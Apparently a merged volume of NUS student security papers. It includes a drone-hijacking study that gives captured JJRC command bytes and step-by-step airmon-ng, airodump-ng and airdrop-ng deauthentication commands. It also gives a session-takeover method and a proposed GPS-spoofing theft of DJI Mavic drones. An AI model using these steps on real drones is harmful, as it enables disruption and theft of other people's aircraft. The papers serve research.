a major inconvenience to users who are already accustomed to 8. ACKNOWLEDGEMENTS
using their VCS via voice activation. We would like to show our appreciation to Professor Hugh
Anderson from the National University of Singapore for giving us
Alternatively, another option would be to enforce a passcode on
the opportunity to explore the given topic and for his valuable
the smartphone. This would severely limit the capabilities of the
insights and help throughout the course of this project.
VCS whilst it is locked. Since the attack is most likely to take
place whilst the victim is not looking at his or her phone, users 9. REFERENCES
should always lock their phones before putting it away. [1] Anon. 2016. Adobe Voco 'Photoshop-for-voice' causes
Some VCSs like Google Assistant also offer customisable settings concern. BBC (November 2016). Retrieved November 16,
that could bypass these restrictions. For example, the “Trusted 2017 from http://www.bbc.com/news/technology-37899902.
Voice” setting allows an attacker to execute a replay attack to [2] Anon. 2017. Building an application with PocketSphinx.
completely bypass any security mechanism on the phone. We CMUSphinx. Retrieved November 16, 2017 from
strongly recommend that this option should not be enabled. https://cmusphinx.github.io/wiki/tutorialpocketsphinx/.
VCS providers are also looking into additional security [3] Conkie, A. Method and system for performing concatenative
mechanisms to prevent unauthorised use of VCSs. For example, S speech synthesis using half-phonemes. Jan. 9, 2001.
Voice allows the user to customise the wake command from the
default “Hi Galaxy”. Apple has also started to develop this in [4] Diao, W., Liu, X., Zhou, Z. and Zhang, K. 2014. Your voice
2017, and will be looking to incorporate custom commands into assistant is mine: How to abuse speakers to steal information
Siri, along with the owner’s unique voice model, as a form of and control your phone. In Proceedings of the 4th ACM
voice biometric for authentication in the future [10]. Workshop on Security and Privacy in Smartphones & Mobile
Devices (Scottsdale, USA, November 03 - 07, 2014).

gp01
PDFsam_merge 12
8
CCS'14. ACM, New York, NY, 63-74. DOI= Retrieved November 16, 2017 from
http://dx.doi.org/10.1145/2666620.2666623. https://deepmind.com/blog/wavenet-generative-model-raw-
[5] DSP Group. 2016. DBMD4 Part Number D4A1A. Data Brief. audio/.
Retrieved November 15, 2017 from [18] Zhang, G., Yan, C., Ji, X., Zhang, T., Zhang, T. and Xu, W.
https://www.dspg.com/wp-content/uploads/DBMD4-Part- 2017. DolphinAttack: Inaudible voice commands. In
Number-D4A1A-Data-Brief-.pdf. Proceedings of the 2017 ACM SIGSAC Conference on
[6] iFixit. 2016. Samsung Galaxy S7 teardown. iFixit. Retrieved Computer and Communications Security (Dallas, USA,
November 15, 2017 from October 30 - November 03, 2017). CCS'17. ACM, New
https://www.ifixit.com/Teardown/Samsung+Galaxy+S7+Tea York, NY, 103-117. DOI=
rdown/56686. https://doi.org/10.1145/3133956.3134052.

[7] Liu, C., Bendtsen, C., Johnson, M., McCarthy, A., Orozco,
O., Peart, M., Shum, S., Utreras, M. and Wang, H. 2015.
Worldwide Internet and mobile users. Retrieved November
15, 2017 from
https://insights.ap.org/uploads/images/eMarketer_Estimates_
2015.pdf.
[8] Lyrebird. 2017. Lyrebird. Retrieved November 16, 2017
from https://lyrebird.ai/.
[9] Ofcom. 2017. Call charges and phone numbers. GOV.UK.
Retrieved November 15, 2017 from https://www.gov.uk/call-
charges.
[10] Purcher, J. 2017. Apple patent reveals a new security feature
coming to Siri. Patently Apple. Retrieved November 17,
2017 from http://www.patentlyapple.com/patently-
apple/2017/04/apple-patent-reveals-a-new-security-feature-
coming-to-siri.html.
[11] Rabiner, L. 1989. A tutorial on hidden Markov models and
selected applications in speech recognition. Proceedings of
the IEEE. 77, 2 (Feb. 1989), 257–286. DOI=
https://doi.org/10.1109/5.18626.
[12] Roy, N., Hassanieh, H. and Choudhury, R. R. 2017.
BackDoor: Making microphones hear inaudible sounds. In
Proceedings of the 15th Annual International Conference on
Mobile Systems, Applications, and Services (Niagara Falls,
USA, June 23 - 23, 2017). MobiSys'17. ACM, New York,
NY, 2-14. DOI= https://doi.org/10.1145/3081333.3081366.
[13] Saito, Y., Takamichi, S. and Saruwatari, H. 2017. Statistical
parametric speech synthesis incorporating generative
adversarial networks. IEEE/ACM Transactions on Audio,
Speech, and Language Processing. PP, 99 (Oct. 2017), 1–1.
DOI= https://doi.org/10.1109/taslp.2017.2761547.
[14] Sak, H.C.F., Senior, A., Rao, K., Beaufays , F., and
Schalkwyk, J. 2015. Google voice search: faster and more
accurate. Google Research Blog. Retrieved November 16,
2017 from https://research.googleblog.com/2015/09/google-
voice-search-faster-and-more.html.
[15] Tamura, M., Mizutani, T., and Kagoshima, T. 2007. Fast
concatenative speech synthesis using pre-fused speech units
based on the plural unit selection and fusion method. IEICE
Transactions on Information and Systems. E90-D, 2 (Feb.
2007), 544–553. DOI= https://doi.org/10.1093/ietisy/e90-
d.2.544.
[16] Tham, I. 2017. OCBC SME customers can get Siri to
activate fund transfers, check balances. The Straits Times.
Retrieved November 17, 2017 from
http://www.straitstimes.com/singapore/ocbc-sme-customers-
can-get-siri-to-activate-fund-transfers-balance-checks.
[17] van den Oord, A., Dieleman, S. and Zen, H. 2016. WaveNet:
a generative model for raw audio. Google Deepmind.

gp01
PDFsam_merge 13
9
PDFsam_merge 14
Drone​ ​Hijacking 
Lim​ ​Shunyong  Ong​ ​Jing​ ​Yin  Priit​ ​Rinken 
National​ ​University​ ​of​ ​Singapore  National​ ​University​ ​of​ ​Singapore  National​ ​University​ ​of​ ​Singapore 
21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd  21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd  21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd 
Singapore​ ​119077  Singapore​ ​119077  Singapore​ ​119077 
+65​ ​9088​ ​7502  +65​ ​9185​ ​7827  +65​ ​8262​ ​9811 
lim.shunyong@u.nus.edu  ongjingyin@u.nus.edu  e0216326@u.nus.edu 
     
Shee​ ​Zhi​ ​Xiang   
National​ ​University​ ​of​ ​Singapore   
21​ ​Lower​ ​Kent​ ​Ridge​ ​Rd 
Singapore​ ​119077 
+65​ ​9624​ ​7327 
a0124209@u.nus.edu 
 
ABSTRACT or an expensive Aerialtronics Altura Zenith Law Enforcement
In this paper, we will be analysing the WiFi communications of Drone, attacks such hijacking or GPS spoofing have been
commercial drones and the security risks exposed by the successfully executed [6]. It is rather alarming how insecure some
implementations. Our analysis is conducted via packet sniffing of of the drones can be. As drones increasingly gain popularity in the
the communications between the drone and its client device. mass consumer market, these insecurities in drones pose a real
Based on our findings for drones JJRC H37 Elfie and DJI Mavic threat, be it for the owners or people within the vicinity of the
Pro,​ ​we​ ​will​ ​identify​ ​possible​ ​attacks​ ​that​ ​can​ ​be​ ​made. drone. To demonstrate the security of consumer drones, we will
be identifying vulnerabilities of the DJI Mavic Pro and the JJRC
Categories​ ​and​ ​Subject​ ​Descriptors Elfie H37, as well as how these vulnerabilities can be exploited by
B.4.1 [​Input/Output and Data Communications​]: Data an​ ​attacker​ ​to​ ​hijack​ ​control​ ​of​ ​these​ ​drones.
Communication​ ​Devices.

General​ ​Terms 2. SETUP


Experimentation.​ ​Security To facilitate our experiment, some equipment has to be prepared.
In this section, we will introduce the tools being used as well as
Keywords their​ ​usage.
Drone, Quadcopter, WiFi Deauthentication, Packet Sniffing,
Unencrypted​ ​WiFi Hardware​ ​used:

1. INTRODUCTION ● 1x​ ​Laptop​ ​running​ ​Kali​ ​Linux​ ​2017.1​ ​release


Drones, or unmanned aerial vehicles(UAVS), are miniature ● 1x WiFi adapter capable of packet injection (Mediatek
RT3070)
aircrafts that can be remotely controlled by pilots from the ground
or by following a pre-programmed mission. It has a multitude of ● Raspberry​ ​Pi​ ​Zero​ ​with​ ​aircrack-ng​ ​installed
uses, from leisure flying by drone hobbyists to critical
reconnaissance missions by the military [1]. With the
technological advances in the recent years, drones have become
increasingly affordable. An average consumer can readily get hold
of a drone for under $100 [2]. US commercial drone use is
projected to expand tenfold by 2021 [3]. Furthermore, drones are
casually entrusted with more responsibilities lately. Amazon has
introduced Amazon Prime Air, a delivery system where Amazon
delivers customer’s packages using drones [4]. Likewise,
Alphabet is investing in drones for a similar service [5]. There is
no doubt that we are heading towards a future where drones will
be​ ​routine​ ​sight​ ​in​ ​our​ ​daily​ ​lives.
With the growing role that drones are beginning to play around us,
there is a need for us to look at the security measures being taken
to ensure that the drone is not compromised. Various parties have
discovered methods to attack a number of commercial drones.
Whether is it a cheap $20 dollar Parrot Bebop commercial drone

gp02
PDFsam_merge 11
15
Figure​ ​1.​ ​Hardware​ ​Setup The drone’s WiFi network is not password protected, hence any
Software​ ​used: phone is capable of connecting to it. The JJRC RC App is freely
available​ ​for​ ​download​ ​in​ ​app​ ​stores
● Python​ ​2.7
● Airdrop-ng During our experimentations, we discovered interesting behaviour
● Airmon-ng in the drone-client communications that are noteworthy. For the
● Aircrack-ng scenario that two users connect to the drone concurrently, we refer
● Wireshark​ ​network​ ​protocol​ ​analyzer to the user who successfully connects first as the primary user,
● Tshark​ ​network​ ​protocol​ ​analyzer and​ ​refer​ ​to​ ​the​ ​other​ ​user​ ​as​ ​the​ ​secondary​ ​user.
● When the primary user is controlling the drone, the
We will be running our experiments using a Linux-based system. secondary user can connect to the same WiFi network
In addition, a special kind of wireless network adapter is needed – and view the camera footage stream via the app. The
one that supports monitor mode and packet injection. By having secondary user is unable to control the drone while the
monitor mode, we are able to monitor all traffic received from a primary​ ​user​ ​has​ ​control​ ​over​ ​it.
wireless network without needing to link with an access point or ● Once the primary user disconnects from the drone, the
ad​ ​hoc​ ​network​ ​[7]. secondary​ ​user​ ​will​ ​be​ ​able​ ​to​ ​control​ ​the​ ​drone.

With the ability to perform packet injection, we will be able to


disrupt or intercept packets during the communication of two 3.1.2​ ​Command​ ​Packets
parties. Having this type of network adapter is essential for us to The drone’s static IP is set at 172.16.10.1. It has a number of ports
carry​ ​out​ ​our​ ​attacks. open for certain functionalities such as controls and video
For the actual attacks, one of the tools we will be using is streaming.
Aircrack-ng. Aircrack-ng is a network software suite with tools In this paper, our focus will be on port 8080, which is the port
meant to assess WiFi network security. It allows one to monitor which receives commands over UDP. Through our
packets, execute various attacks such as replay attacks, experimentations, we determined that the command packets are of
deauthentication and create fake access points, test WiFi cards and frame​ ​length​ ​102​ ​bytes,​ ​and​ ​contain​ ​data​ ​of​ ​length​ ​11​ ​bytes.
driver​ ​capabilities​ ​and​ ​crack​ ​WEP​ ​and​ ​WPA/WPA2-PSK​ ​[8].
The user navigates the drones via joystick controls on the phone
We will mainly be using the suite for monitoring packets and application, which means that there is a range of data commands
replaying packets using tools such as airmon-ng, airodump-ng and for navigating the drone in a single direction, depending on how
airdrop-ng. long​ ​of​ ​a​ ​distance​ ​the​ ​user​ ​pulls​ ​the​ ​joystick.
For this attack we chose to run our attacks from a Raspberry Pi For simplicity, we decided to narrow down our set of data values
Zero because it is very small and portable, meaning this to contain only extreme directions, i.e. when the user pulls the
configuration could possibly be attached to a drone to approach joystick​ ​to​ ​the​ ​far​ ​left​ ​/​ ​right​ ​/​ ​up​ ​/​ ​down.
the target and it is also able to run a full-fledged Debian operating
system which allows it to run all the tools necessary for this The table below maps the command actions to the corresponding
attack. data values that we retrieved. Byte values that carry significance
are​ ​underlined.
3. DRONE​ ​ANALYSIS
This section describe the drones that we were using for our Table​ ​1.​ ​List​ ​of​ ​frames​ ​corresponding​ ​to​ ​the​ ​drone’s
experimentation and the findings we derived based on the setup movement
we​ ​have​ ​done​ ​in​ ​section​ ​2.
Start​ ​up ff08​7e3f403f​901010​40​cb 
3.1 JJRC​ ​H37​ ​Elfie
Emergency​ ​Stop ff08​7e3f403f​901010​a0​6b 

3.1.1​ ​Background Up ff08​fc3b403f​9010100091 


The JJRC H37 Elfie has only one mode of operation, which is via
its Smartphone Application. The application can be used to Down ff08​0040403f​9010100088 
control the drone when the smartphone is connected to the drone’s
WiFi network. The typical use case of a JJRC H37 Elfie drone is Move​ ​Forward ff08​7e3f0143​9010100046 
outlined​ ​below.
1. The user downloads and installs the JJRC RC App into Move​ ​Right ff08​847e403f​90101000c6 
their​ ​smartphone.
2. The​ ​user​ ​turns​ ​on​ ​the​ ​JJRC​ ​H37​ ​Elfie​ ​drone. Move​ ​Left ff08​7201403f​9010100055 
3. The user connects the smartphone to the drone’s WiFi
network,​ ​which​ ​has​ ​the​ ​format​ ​JJRC-xxxxxx​ ​SSID. Move​ ​Backwards ff08​7e3f7f3d​90101000ce 
4. Once connected to the WiFi, the user will be able to
navigate the drone using the app controls. The app Rotate​ ​Right ff08​7e3f417e​90101000cb 
streams​ ​live​ ​footage​ ​from​ ​the​ ​drone’s​ ​camera.
Rotate​ ​Left ff08​7e3f4000​901010004a 

gp02
PDFsam_merge 12
16
3.2 DJI​ ​Mavic​ ​Pro

3.2.1​ ​Background
The DJI Mavic Pro has two modes of operation: through the
Smartphone Application or Radio Controller. Due to time
constraints of this project, we will only look at control of the
drone​ ​via​ ​the​ ​Smartphone​ ​Application.
The Smartphone Application will control the drone using the
drone’s WiFi network. The typical use case of DJI Mavic Pro
using​ ​WiFi​ ​is​ ​outlined​ ​below.
1. Before turning on the Mavic, the user flips the Control
Mode​ ​switch​ ​on​ ​the​ ​drone​ ​to​ ​the​ ​WiFi​ ​option. Figure​ ​2.​ ​Packet​ ​Sniffing​ ​with​ ​Wireshark
2. The user turns on the aircraft and connects to the
One of them is large UDP packets from port 4096 of the drone to
Mavic’s network, which has the format Mavic-xxxxxx.
port 8888 of controller, which is presumably the video stream.
The password is on a QR code sticker pasted on the
Another is 12 byte data TCP packets from source port 39005 of
front​ ​right​ ​arm​ ​of​ ​the​ ​aircraft.
the controller from the mobile application to the destination port
3. Once connected, the user opens the DJI Go app. The
8888​ ​of​ ​the​ ​drone.
user will now be able to see settings and live view as
normal. The user can also change SSID name and Lastly, there are a number of 11 byte data UDP packets from
password​ ​if​ ​desired. source port 45048 of the mobile application to destination port
4. The user will be able to navigate the drone using the app 8080​ ​of​ ​the​ ​drone.
controls. The app streams live footage from the drone’s We noticed that the data in the 11 byte UDP packets tend to
camera. remain constant until commands are given from the controller,
The DJI Mavic Pro user guide discloses some interesting features leading us to believe this is the port that is responsible for
which​ ​are​ ​potentially​ ​useful​ ​for​ ​us. receiving​ ​commands​ ​for​ ​the​ ​drone.
● The drone’s WiFi network is password encrypted and Now that we know what packets to look out for, we will
follows WPA protocol. Drones come with a default investigate further into the data of packets sent to this particular
password​ ​that​ ​contains​ ​8​ ​hexadecimal​ ​values. port 8080. Since there is a lot of traffic between the drone and the
● The drone has a failsafe procedure where it will return controller, wireshark tends to get flooded with information,
home if the app crashes or if the user loses WiFi making​ ​it​ ​difficult​ ​to​ ​keep​ ​track​ ​of​ ​the​ ​changes​ ​in​ ​the​ ​data​ ​packet.
connection.​ ​Home​ ​is​ ​where​ ​the​ ​drone​ ​thinks​ ​the​ ​user​ ​is. In order to view the data contents easily, we used tshark and
● A lot of flight mode features are disabled and the range filtered the data using the command ​sudo  tshark  -I  -f 
is​ ​significantly​ ​less​ ​on​ ​WiFi​ ​mode. "port  8080"  -f  "dst  net  172.16.10.1"  -Y 
"frame.len==102"​ ​-T​ ​fields​ ​-e​ ​data 

4. ANALYSIS​ ​PROCESS
In this section, we will explain the procedure we have taken to
analyze the data being transmitted to and from the drone. Since all
data is being transmitted through the JJRC WiFi network, we will
be mainly looking at the WiFi packets going through this network
using​ ​Wireshark​ ​and​ ​Tshark.

4.1 Capturing
When we ran wireshark, we could see multiple TCP and UDP
packets to and from various ports on the drone. It mainly
consisted​ ​of​ ​three​ ​different​ ​types​ ​of​ ​packets.

Figure​ ​3.​ ​Packet​ ​Sniffing​ ​with​ ​Tshark


This allowed us to view packets with a frame length of 102 bytes
that were sent to the drone’s IP address on port 8080, which is the
port that receives commands. We filtered it further to display only
the data field, allowing us to easily note changes in the data when
different​ ​commands​ ​are​ ​given.

gp02
PDFsam_merge 13
17
4.2 Analyzing
The​ ​first​ ​thing​ ​we​ ​noticed​ ​in​ ​the​ ​11​ ​byte​ ​data​ ​field​ ​is​ ​that​ ​the​ ​first 5. ATTACK​ ​VECTORS
two​ ​bytes​ ​are​ ​always​ ​of​ ​value​ ​ff​ ​08​​ ​and​ ​that​ ​the​ ​7-9th​ ​byte​ ​will
always​ ​be​ ​90​ ​10​ ​10​.​ ​Secondly,​ ​the​ ​last​ ​byte​ ​is​ ​repeated​ ​for Based on the results in Section 4, we were able to perform two
certain​ ​commands,​ ​leading​ ​us​ ​to​ ​believe​ ​the​ ​last​ ​byte​ ​is​ ​a types​ ​of​ ​attack​ ​which​ ​will​ ​be​ ​further​ ​elaborated​ ​in​ ​this​ ​section.
checksum.

The​ ​3-4th​ ​bytes​ ​control​ ​movements​ ​up,​ ​down,​ ​left​ ​and​ ​right,​ ​with 5.1 Denial​ ​of​ ​Service​ ​Attack
the​ ​default​ ​value​ ​as​ ​7e​ ​3f​.​ ​The​ ​5-6th​ ​bytes​ ​control​ ​the The Denial of Service attack was carried out by filtering out
movements​ ​forward,​ ​backward,​ ​rotate​ ​left​ ​and​ ​rotate​ ​right,​ ​with SSID-s from the airodump report which match the known SSID-s
the​ ​default​ ​value​ ​as​ ​40​ ​3f​.​ ​Lastly,​ ​the​ ​10th​ ​byte​ ​controls​ ​the​ ​start of the drone. In the scope of this project, we performed the
and​ ​stop​ ​commands​ ​of​ ​the​ ​drone,​ ​with​ ​the​ ​default​ ​value​ ​as​ ​00​. experiment​ ​with​ ​both​ ​“JJRC-XXXXX”​ ​and​ ​“Mavic-XXXXXX.”

The​ ​table​ ​below​ ​summarises​ ​how​ ​each​ ​byte​ ​position​ ​corresponds We can assume that the standard SSID of the wireless network
to​ ​each​ ​drone’s​ ​command. created by the drone is publicly available for other manufacturers
Table​ ​2.​ ​Frame​ ​Inspection as well. Information about the hardware addresses of these
networks was passed on to generate a filter settings file for
Byte 1-2 3-4 5-6 7-9 10 11 airdrop-ng.
Pos Airdrop-ng, which is part of the aircrack-ng package, broadcasts
a large amount of deauthentication packets which disconnects the
Com ff​ ​08 Up Fwd 90​ ​10​ ​10 Start Check controlling device from the drone and prevents reconnection for
mand Down Back Stop sum as​ ​long​ ​as​ ​the​ ​deauthentication​ ​packets​ ​are​ ​being​ ​broadcast.
Left Rleft
Right Rright Else: Our step by step approach to perform the denial of service attack
00 is​ ​described​ ​below.
Else: Else:
1. The WiFi adaptor is first set to monitoring mode using
7e​ ​3f 40​ ​3f
the​ ​command​ ​airmon-ng​ ​start​ ​wlan0 
2. We initiate Airodump on the WiFi adaptor to capture all
Next,​ ​we​ ​looked​ ​into​ ​what​ ​is​ ​the​ ​content​ ​of​ ​each​ ​specific​ ​byte​ ​for the WiFi traffic into a file tempdata with the command
each​ ​specific​ ​command.​ ​What​ ​we​ ​found​ ​is​ ​summarised​ ​in​ ​the airodump-ng​ ​-w​ ​tempdata​ ​wlan0mon 
table​ ​below. 3. From the traffic captured, we identify our target drone
and create a airdrop-ng settings file with a python script,
which would deauthenticate all clients connected to the
Table​ ​3.​ ​Summary​ ​of​ ​the​ ​Drone​ ​Command​ ​in​ ​hexadecimal
drone​ ​ ​with​ ​the​ ​SSID​ ​of​ ​JJRC-XXXX.
Command Byte​ ​Position(s) Byte(s) 4. We proceed to flood deauthentication requests via the
WiFi adaptor with the command ​python 
Vertical​ ​Up 3-4 fc​ ​3b  /usr/src/aircrack/scripts/airdrop-ng/
airdrop-ng  -i  wlan0mon  -t 
Vertical​ ​Down 3-4 00​ ​40  tempdata-01.csv  -r  settings.txt  . 
tempdata-01.csv file is the output of the airodump-ng
and settings.txt is the filter file created by the python
Horizontal​ ​Left 3-4 72​ ​01 
script.
5. Within seconds, the user will lose control of the drone
Horizontal​ ​Right 3-4 84​ ​7e  and is unable to send anymore commands using the
mobile​ ​application.
Move​ ​Forward 5-6 01​ ​43 

Move​ ​Backward 5-6 7f​ ​3d 

Rotate​ ​Left 5-6 40​ ​00 

Rotate​ ​Right 5-6 41​ ​7e 

Start 10 40 

Stop 10 a0 

By learning the way in which the command data is formatted, we


are now able to spoof packets to control the drone, allowing us to
execute malicious attacks such as denial of service and even
hijacking​ ​the​ ​drone. Figure​ ​4.​ ​Deauthentication​ ​Request​ ​sent​ ​to​ ​the​ ​drone

gp02
PDFsam_merge 14
18
drone it is possible to take over the DJI drone in Wi-Fi mode
when​ ​flying​ ​close​ ​enough​ ​to​ ​it.
5.2 Session​ ​Hijacking
The cheaper and simpler drones, as represented by the JJRC Elfie
drone in our project, use an open Wi-Fi network for 6. DISCUSSIONS
communicating with their control devices. Our observations In this section, we will describe the challenges that we faced and
indicate though that only the first client to connect to the network also how we can improve on our experiments if we had more
is​ ​given​ ​sole​ ​control​ ​of​ ​the​ ​drone. time.
The following clients are capable of only viewing the
videostream. This means that after flooding deauthentication 6.1 Limitations
packets, our attack machine just needs to be the first to connect to In​ ​this​ ​project,​ ​due​ ​to​ ​the​ ​limited​ ​time​ ​we​ ​have​ ​with​ ​the​ ​DJI​ ​Mavic
the​ ​drone​ ​in​ ​order​ ​to​ ​gain​ ​full​ ​control​ ​of​ ​it. Pro,​ ​we​ ​were​ ​unable​ ​to​ ​explore​ ​any​ ​other​ ​attacks​ ​that​ ​the​ ​DJI
Mavic​ ​Pro​ ​may​ ​be​ ​vulnerable​ ​to.
This proved to be relatively simple as the attacking machine has a
time advantage and can start connecting to the drone as soon as it We​ ​managed​ ​only​ ​to​ ​perform​ ​a​ ​deauthentication​ ​attack​ ​on​ ​the​ ​DJI
stops sending the deauthentication packets, whereas the initial Mavic​ ​Pro​ ​and​ ​were​ ​unable​ ​to​ ​perform​ ​the​ ​session​ ​hijacking​ ​as​ ​it
controlling smart devices implement a timeout between requires​ ​time​ ​for​ ​decrypting​ ​and​ ​analysing​ ​the​ ​packet​ ​transmitted
reconnection​ ​attempts. between​ ​the​ ​drone​ ​and​ ​the​ ​user.
When connection is established with the drone, we can control the 6.2 Future​ ​Work
drone by mapping the control commands sniffed with tshark One future expansion of the project will be to perform a brute
earlier onto the keyboard. When the original controlling device is force on the DJI Mavic Pro access point password and decrypt the
able to reconnect to the drone, it will be limited to only the camera packets​ ​transmitted​ ​between​ ​the​ ​user​ ​and​ ​the​ ​drone.
view​ ​functionality,​ ​effectively​ ​losing​ ​control​ ​of​ ​the​ ​drone.
With the recent announcement of the KRACK attack on WPA2
In order to regain control of the drone, it would have to launch a [9], it is also possible to capture the 4-way WPA2 handshake, so
similar​ ​attack​ ​on​ ​its​ ​own. the​ ​brute​ ​force​ ​attack​ ​can​ ​be​ ​done​ ​independently​ ​from​ ​the​ ​drone.
We would also like to experiment on the DJI Mavic Pro with GPS
Spoofing. When the drone is disconnected from the user, its
failsafe procedure is to return to the user. Since we have verified
that deauthentication of the WiFi connection to the Mavic is
doable, we can trigger the Mavic to return to the user. At the
same time, we can spoof the GPS coordinates such that the drone
would return to us instead of the user, proving an attack vector
that allows attackers to steal expensive Mavic drones controlled
over​ ​WiFi.

7. CONCLUSIONS
After analysis of the DJI Mavic Pro and the JJRC Elfie H37, we
can see that commercial drones vulnerable to simple attacks exist
Figure​ ​5.​ ​User​ ​Interface​ ​of​ ​the​ ​hijacking​ ​controller on​ ​the​ ​market.
Although we were unable to hijack the more sophisticated DJI
The more expensive and technologically advanced DJI Mavic Pro Mavic Pro, denial of service attacks through WiFi
drone uses WPA2-PSK to secure its wireless network. The default deauthentication was still possible. In terms of CIA, cheaper
key is a 8 character long hexadecimal value which is unique to drones​ ​tend​ ​not​ ​to​ ​ensure​ ​confidentiality.
each​ ​machine.
As we can see from the two drones, the DJI Mavic Pro uses
This prevents a simple session overtaking, but alternative WPA2-PSK to secure its wireless network, while the JJRC Elfie
approaches which are not in the scope of this paper are possible. H37 does not even have a password for its open network. In both
We identified two approaches to hijack the Wi-Fi control sessions drones, we can see that integrity exists as the DJI Mavic Pro only
of​ ​the​ ​DJI​ ​Mavic​ ​Pro. allows a single connection to the drone at ay point in time, while
We were able to capture the 4-way handshake between the the​ ​JJRC​ ​Elfie​ ​H37​ ​refuses​ ​commands​ ​from​ ​secondary​ ​users.
controlling​ ​smart​ ​device​ ​and​ ​the​ ​DJI​ ​drone. WiFi-controlled drones on the market still fail to enforce
The keyspace for the default passwords is 8 hexadecimal values, availability, allowing attackers to prevent victims from controlling
or 32 bits which means that it is susceptible to a bruteforce attack their drones with WiFi deauthentication. Overall, it seems that
in​ ​a​ ​reasonable​ ​amount​ ​of​ ​time. most drones on the market were built without security
considerations, having little to no security at all. More
The other attack vector we observed is that the default password is sophisticated drones do have more protection against most attacks
printed on the outside of the drone in both human-and with encrypted communications, but may still contain
machine-readable form (QR-code). This means that using vulnerabilities.
appropriate optical hardware and our demo machine attached to a

gp02
PDFsam_merge 15
19
8. ACKNOWLEDGMENTS
We would like to thank Professor Hugh Anderson for his patience
and​ ​ ​guidance​ ​in​ ​helping​ ​us​ ​with​ ​the​ ​project.
Next, we would also like to thank Professor Martin Henz for
providing​ ​us​ ​with​ ​the​ ​DJI​ ​Mavic​ ​Pro​ ​for​ ​the​ ​experimentation.
Lastly, we would like to give credit to the user adria.junyent-ferre
from hackaday.io who did a similar project with the JJRC Elfie
drone, which provided us inspiration on how we can control the
drone​ ​using​ ​our​ ​laptop.

9. REFERENCES
[1] Meier,​ ​C.​ ​(2015,​ ​February​ ​03).​ ​A​ ​Brief​ ​Introduction​ ​to
Drones.​ ​Retrieved​ ​November​ ​01,​ ​2017,​ ​from
http://www.deaftv.co.za/brief-introduction-drones/
[2] Dronelli,​ ​V.​ ​(2017,​ ​October​ ​23).​ ​The​ ​20​ ​Best​ ​Cheap​ ​Drones​ ​-
[Fall​ ​2017]​ ​Affordable​ ​Drones​ ​For​ ​Beginners.​ ​Retrieved
November​ ​01,​ ​2017,​ ​from
https://www.dronethusiast.com/cheap-drones-guide/
[3] Shepardson,​ ​D.​ ​(2017,​ ​March​ ​22).​ ​U.S.​ ​commercial​ ​drone
use​ ​to​ ​expand​ ​tenfold​ ​by​ ​2021:​ ​government​ ​agency.
Retrieved​ ​November​ ​01,​ ​2017,​ ​from
https://www.reuters.com/article/us-usa-drones/u-s-commerci
al-drone-use-to-expand-tenfold-by-2021-government-agency
-idUSKBN16S2NM
[4] Amazon​ ​Prime​ ​Air.​ ​(n.d.).​ ​Retrieved​ ​November​ ​01,​ ​2017,
from
https://www.amazon.com/Amazon-Prime-Air/b?node=80377
20011
[5] Project​ ​Wing​ ​–​ ​X.​ ​(n.d.).​ ​Retrieved​ ​November​ ​01,​ ​2017,
from​ ​https://x.company/projects/wing/
[6] Walters,​ ​S.​ ​(2016,​ ​October​ ​29).​ ​How​ ​Can​ ​Drones​ ​Be
Hacked?​ ​The​ ​updated​ ​list​ ​of​ ​vulnerable​ ​drones​ ​&​ ​attack
tools.​ ​Retrieved​ ​November​ ​01,​ ​2017,​ ​from
https://medium.com/@swalters/how-can-drones-be-hacked-t
he-updated-list-of-vulnerable-drones-attack-tools-dd2e006d6
809
[7] November​ ​02,​ ​2017,​ ​from
https://latesthackingnews.com/2017/07/19/what-is-monitor-
mode-in-wifi/.

[8] Aircrack-ng.​ ​(2017).​ ​Retrieved​ ​from


https://www.aircrack-ng.org/

[9] Vanhoef,​ ​M.,​ ​&​ ​Piessens,​ ​F.​ ​(2017).​ ​Key​ ​Reinstallation


Attacks:​ ​Forcing​ ​Nonce​ ​Reuse​ ​in​ ​WPA2.​ ​Retrieved​ ​from
https://papers.mathyvanhoef.com/ccs2017.pdf
[10]​ ​P.​ ​(2016,​ ​November​ ​16).​ ​Flying​ ​the​ ​DJI​ ​Mavic​ ​Pro​ ​with
Smartphone​ ​WIFI.​ ​Retrieved​ ​November​ ​09,​ ​2017,​ ​from
https://www.rcgeeks.co.uk/blog/flying-dji-mavic-smartphone
-wifi  

gp02
PDFsam_merge 16
20
Exploration​ ​of​ ​Weakness​ ​in​ ​Bike​ ​Sharing​ ​System 
 
Tan​ ​Fengji  Tan​ ​Jian​ ​Sin  Tan​ ​Ngee​ ​Joel​ ​Jonas 
NUS​ ​School​ ​of​ ​Computing  NUS​ ​School​ ​of​ ​Computing  NUS​ ​School​ ​of​ ​Computing 
13​ ​Computing​ ​Drive  13​ ​Computing​ ​Drive  13​ ​Computing​ ​Drive 
Singapore​ ​117417  Singapore​ ​11741  Singapore​ ​11741 
+65​ ​8626​ ​0290  +65​ ​9451​ ​7087  +65​ ​9178​ ​7092 
a0129845@u.nus.edu  e0003810@u.nus.edu  a0121298@u.nus.edu 
     
Tan​ ​Wee​ ​Chen​ ​William  Tang​ ​Di​ ​Feng   
NUS​ ​School​ ​of​ ​Computing  NUS​ ​School​ ​of​ ​Computing 
13​ ​Computing​ ​Drive  13​ ​Computing​ ​Drive   
Singapore​ ​11741  Singapore​ ​11741   
+65​ ​8383​ ​0049  +65​ ​8366​ ​6988 
 
a0121760@u.nus.edu  e0011840@u.nus.edu 
 
 
 

ABSTRACT customers, bike sharing companies will have to minimize their


Bike sharing systems benefitted many consumers by offering operating costs. Cost-cutting measures includes reducing the
them greater flexibility in their choice of transport at a low cost. budget for the development and maintenance of a secure system
With the great value it brings to the lives of many people, it is no for renting bicycles, resulting in the existence of vulnerabilities
wonder that the number of users has been steadily increasing since which​ ​we​ ​will​ ​uncover​ ​in​ ​this​ ​paper.
its inception. As the number of users grow, the importance of At the moment, there are three major bike sharing companies that
ensuring​ ​system​ ​reliability​ ​and​ ​security​ ​grows​ ​as​ ​well. is operating in Singapore, namely oBike, Mobike and Ofo.
Bike sharing companies often employ the use of IoT devices to oBike’s system was chosen in the search of weaknesses and
secure their bicycles. As the concept of IoT is relatively new, vulnerabilities​ ​for​ ​this​ ​paper.
security considerations for IoT devices and its systems tend to be
inadequate.
In this paper, we explore the weaknesses of oBike’s bike sharing
2. BIKE​ ​SHARING​ ​PROCESS
system. In addition, the paper also details several attacks that In order for a user to rent a bicycle from a bike sharing company,
includes but not limited to allowing an attacker to update and the user has to download an app created by the bike sharing
change a bike’s location to the attacker’s will and granting company and register an account on the app. Upon completing the
